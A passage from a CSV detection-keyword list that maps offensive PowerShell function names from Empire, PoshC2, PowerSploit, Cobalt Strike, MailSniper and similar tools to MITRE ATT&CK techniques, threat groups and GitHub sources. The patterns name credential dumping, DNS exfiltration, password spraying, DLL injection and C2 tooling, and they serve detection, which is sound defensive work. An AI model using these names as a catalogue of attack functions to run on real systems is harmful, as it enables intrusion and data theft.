Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7851","2361","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" +"*Invoke-DAFT.*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"*invoke-daisychain*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*Invoke-DCOM.ps1*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1091","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*invoke-dcompayload*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" 
+"*Invoke-DCSync*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1056","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Invoke-DefenderExclusionsCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2254","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" 
+"*Invoke-DinvokeKatz*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"*Invoke-DllHijackingCheck*","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1009","830","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" +"*Invoke-DllHijackingCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2254","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" +"*Invoke-DllInjection*","offensive_tool_keyword","empire","empire script function. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1047","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Invoke-DllInjection*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*Invoke-DNSExfiltrator*","offensive_tool_keyword","DNSExfiltrator","DNSExfiltrator allows for transfering (exfiltrate) a file over a DNS request covert channel. 
This is basically a data leak testing tool allowing to exfiltrate data over a covert channel.","T1041 - T1048","TA0010 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/Arno0x/DNSExfiltrator","1","1","N/A","10","8","792","189","2019-10-06T22:24:55Z","2017-12-20T13:58:09Z" +"*Invoke-DNSUpdate.ps1*","offensive_tool_keyword","Powermad","PowerShell MachineAccountQuota and DNS exploit tools","T1087 - T1098 - T1018 - T1046 - T1081","TA0007 - TA0006 - TA0005 - TA0001","N/A","N/A","POST Exploitation tools","https://github.com/Kevin-Robertson/Powermad","1","0","N/A","N/A","10","1022","171","2023-01-11T00:48:35Z","2017-09-05T18:34:03Z" +"*Invoke-DomainHarvest*","offensive_tool_keyword","MailSniper","Invoke-DomainHarvest* will attempt to connect to an * portal and determine a valid domain name for logging into the portal","T1595 T1114 T1590 T1591","N/A","N/A","N/A","Reconnaissance","https://github.com/dafthack/MailSniper","1","1","N/A","N/A","10","2626","554","2022-10-20T08:13:33Z","2016-09-08T00:36:51Z" +"*Invoke-DomainHarvestOWA*","offensive_tool_keyword","MailSniper","MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. 
or by an administrator to search the mailboxes of every user in a domain.","T1114 - T1134.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1","1","1","N/A","N/A","10","2626","554","2022-10-20T08:13:33Z","2016-09-08T00:36:51Z" +"*Invoke-DomainPasswordSpray*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*Invoke-DOSfuscation*","offensive_tool_keyword","Invoke-DOSfuscation","Invoke-DOSfuscation is a PowerShell v2.0+ compatible cmd.exe command obfuscation framework. (White paper: https://www.fireeye.com/blog/threat-research/2018/03/dosfuscation-exploring-obfuscation-and-detection-techniques.html)","T1027 - T1140 - T1059","TA0002 - TA0003 - TA0040","N/A","N/A","Defense Evasion","https://github.com/danielbohannon/Invoke-DOSfuscation","1","1","N/A","N/A","8","744","129","2018-03-27T12:16:18Z","2018-03-19T16:47:54Z" +"*Invoke-DriverCoInstallersCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2254","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" +"*Invoke-DumpOWAMailboxViaMSGraphApi*","offensive_tool_keyword","TokenTactics","Azure JWT Token Manipulation Toolset","T1134.002 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation Tools","https://github.com/rvrsh3ll/TokenTactics","1","1","N/A","N/A","5","440","66","2023-09-26T18:45:16Z","2021-07-08T02:28:12Z" +"*invoke-edrchecker*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers 
with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z"
+"*Invoke-EDRChecker.ps1*","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","1","N/A","10","10","176","35","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z"
+"*Invoke-EgressCheck*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-EgressCheck.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z"
+"*Invoke-EgressCheck.ps1*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1141","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z"
+"*Invoke-Empire *","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","0","N/A","N/A","10","3589","533","2023-09-08T05:50:59Z","2019-08-01T04:22:31Z"
+"*Invoke-Empire*","offensive_tool_keyword","empire","empire function name of agent.ps1. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1047","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z"
+"*Invoke-EndpointProtectionCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2254","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z"
+"*Invoke-EnumerateAzureBlobs.ps1*","offensive_tool_keyword","MicroBurst","A collection of scripts for assessing Microsoft Azure security","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/NetSPI/MicroBurst","1","1","N/A","6","10","1711","280","2023-09-21T15:53:06Z","2018-07-16T16:47:20Z"
+"*Invoke-EnumerateAzureSubDomains.ps1*","offensive_tool_keyword","MicroBurst","A collection of scripts for assessing Microsoft Azure security","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/NetSPI/MicroBurst","1","1","N/A","6","10","1711","280","2023-09-21T15:53:06Z","2018-07-16T16:47:20Z"
+"*Invoke-EnumerateLocalAdmin -Verbose*","greyware_tool_keyword","powershell","Find local admins on the domain machines","T1069.002 - T1087.002 - T1018","TA0007 - TA0009","N/A","N/A","AD Enumeration","https://hideandsec.sh/books/cheatsheets-82c/page/active-directory","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A"
+"*invokeenumeratelocaladmin*","offensive_tool_keyword","cobaltstrike","PowerView menu for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tevora-threat/aggressor-powerview","1","1","N/A","10","10","60","17","2018-03-22T00:21:57Z","2018-03-22T00:21:13Z"
+"*Invoke-EnumerateLocalAdmin*","offensive_tool_keyword","cobaltstrike","PowerView menu for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tevora-threat/aggressor-powerview","1","1","N/A","10","10","60","17","2018-03-22T00:21:57Z","2018-03-22T00:21:13Z"
+"*Invoke-EnumerateLocalAdmin*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","powerview.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z"
+"*Invoke-EnumerateLocalAdmin*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z"
+"*Invoke-EnvBypass*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-BypassUACTokenManipulation.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z"
+"*Invoke-EnvBypass.*","offensive_tool_keyword","cobaltstrike","The Elevate Kit demonstrates how to use third-party privilege escalation attacks with Cobalt Strike's Beacon payload.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rsmudge/ElevateKit","1","1","N/A","10","10","813","205","2020-06-22T21:12:24Z","2016-12-08T03:51:09Z"
